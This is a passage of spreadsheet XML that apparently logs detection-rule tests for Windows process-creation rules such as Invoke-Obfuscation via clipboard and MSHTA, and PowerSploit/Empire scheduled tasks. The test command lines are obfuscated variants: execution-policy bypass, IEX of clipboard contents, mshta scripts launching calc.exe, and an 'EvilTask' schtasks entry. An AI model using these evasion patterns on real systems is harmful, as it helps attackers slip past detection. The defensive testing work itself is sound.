        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1850" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCuTIoNpolIcy Bypass -CommANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1850" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1850" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1850" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1851" ht="15.75" customHeight="1" s="42">
      <c r="A1851" s="43" t="n"/>
      <c r="B1851" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1851" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1851" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1851" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -c "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1851" s="44" t="n"/>
      <c r="J1851" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1851" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1852" ht="15.75" customHeight="1" s="42">
      <c r="A1852" s="43" t="n"/>
      <c r="B1852" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1852" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1852" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1852" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -C "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1852" s="44" t="n"/>
      <c r="J1852" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1852" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1853" ht="15.75" customHeight="1" s="42">
      <c r="A1853" s="43" t="n"/>
      <c r="B1853" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1853" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1853" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1853" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | c^l^i^p.exe &amp;&amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1853" s="43" t="n"/>
      <c r="J1853" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1853" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1854" ht="15.75" customHeight="1" s="42">
      <c r="A1854" s="43" t="n"/>
      <c r="B1854" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1854" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1854" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1854" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | clip &amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1854" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1854" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1854" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1854" s="43" t="n"/>
      <c r="J1854" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1854" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1855" ht="15.75" customHeight="1" s="42">
      <c r="A1855" s="43" t="n"/>
      <c r="B1855" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1855" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1855" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1855" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1855" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1855" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1855" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1855" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1855" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1856" ht="15.75" customHeight="1" s="42">
      <c r="A1856" s="43" t="n"/>
      <c r="B1856" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1856" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1856" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1856" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1856" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1856" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1856" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1856" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1856" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1857" ht="15.75" customHeight="1" s="42">
      <c r="A1857" s="43" t="n"/>
      <c r="B1857" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1857" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1857" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1857" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1857" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1857" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1857" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1857" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1857" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1858" ht="15.75" customHeight="1" s="42">
      <c r="A1858" s="43" t="n"/>
      <c r="B1858" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1858" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1858" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1858" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1858" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1858" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1858" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1858" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1858" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1859" ht="15.75" customHeight="1" s="42">
      <c r="A1859" s="43" t="n"/>
      <c r="B1859" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1859" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1859" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1859" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1859" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1859" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1859" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1859" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1859" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1860" ht="15.75" customHeight="1" s="42">
      <c r="A1860" s="43" t="n"/>
      <c r="B1860" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1860" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1860" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1860" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1860" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1860" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1860" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1860" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1860" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1861" ht="15.75" customHeight="1" s="42">
      <c r="A1861" s="43" t="n"/>
      <c r="B1861" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1861" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1861" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1861" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1861" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1861" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1861" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1861" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1861" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1862" ht="15.75" customHeight="1" s="42">
      <c r="A1862" s="43" t="n"/>
      <c r="B1862" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1862" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1862" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1862" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host 'Bypass Test' | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1862" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1862" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1862" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1862" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1862" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1863" ht="15.75" customHeight="1" s="42">
      <c r="A1863" s="43" t="n"/>
      <c r="B1863" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1863" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1863" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1863" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1863" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1863" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1863" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1863" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1863" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1864" ht="15.75" customHeight="1" s="42">
      <c r="A1864" s="43" t="n"/>
      <c r="B1864" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1864" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1864" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1864" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1864" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1864" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1864" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1864" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1864" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1865" ht="15.75" customHeight="1" s="42">
      <c r="A1865" s="43" t="n"/>
      <c r="B1865" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1865" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1865" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1865" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1865" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1865" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1865" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1865" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1865" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1866" ht="15.75" customHeight="1" s="42">
      <c r="A1866" s="43" t="n"/>
      <c r="B1866" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1866" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1866" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1866" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1866" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1866" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1866" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1866" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1866" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1867" ht="15.75" customHeight="1" s="42">
      <c r="A1867" s="43" t="n"/>
      <c r="B1867" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1867" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1867" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1867" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1867" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1867" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1867" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1867" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1867" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1868" ht="15.75" customHeight="1" s="42">
      <c r="A1868" s="43" t="n"/>
      <c r="B1868" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1868" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1868" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1868" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1868" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1868" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1868" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1868" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1868" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1869" ht="15.75" customHeight="1" s="42">
      <c r="A1869" s="43" t="n"/>
      <c r="B1869" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1869" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1869" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1869" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1869" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1869" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1869" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1869" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1869" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1870" ht="15.75" customHeight="1" s="42">
      <c r="A1870" s="43" t="n"/>
      <c r="B1870" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1870" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1870" s="44" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1870" s="44" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp; mshta vbscript:CreateObject("WScript.Shell").Exec("%a%")(window.close)</t>
        </is>
      </c>
      <c r="F1870" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1870" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1870" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions (cc7abbd0-762b-41e3-8a26-57ad50d2eea3)</t>
        </is>
      </c>
      <c r="J1870" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1870" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1871" ht="15.75" customHeight="1" s="42">
      <c r="A1871" s="43" t="n"/>
      <c r="B1871" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1871" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1871" s="44" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1871" s="44" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp;&amp; mshta javascript:a=new ActiveXObject("WScript.Shell");a.Run("%a%");window.close();</t>
        </is>
      </c>
      <c r="F1871" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1871" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1871" s="44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J1871" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1871" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1872" ht="15.75" customHeight="1" s="42">
      <c r="A1872" s="43" t="n"/>
      <c r="B1872" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1872" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1872" s="44" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1872" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp;&amp; m^shta vbscript:createobject("WScript.Shell").run("calc.exe")(window.close)</t>
        </is>
      </c>
      <c r="F1872" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1872" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1872" s="44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1872" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1872" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1873" ht="15.75" customHeight="1" s="42">
      <c r="A1873" s="43" t="n"/>
      <c r="B1873" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1873" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1873" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1873" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F1873" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1873" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1873" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1873" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1873" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1874" ht="15.75" customHeight="1" s="42">
      <c r="A1874" s="43" t="n"/>
      <c r="B1874" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1874" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1874" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1874" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CReatE -"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /sc WEEKLY -"D" MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F1874" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1874" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1874" s="43" t="inlineStr">
        <is>
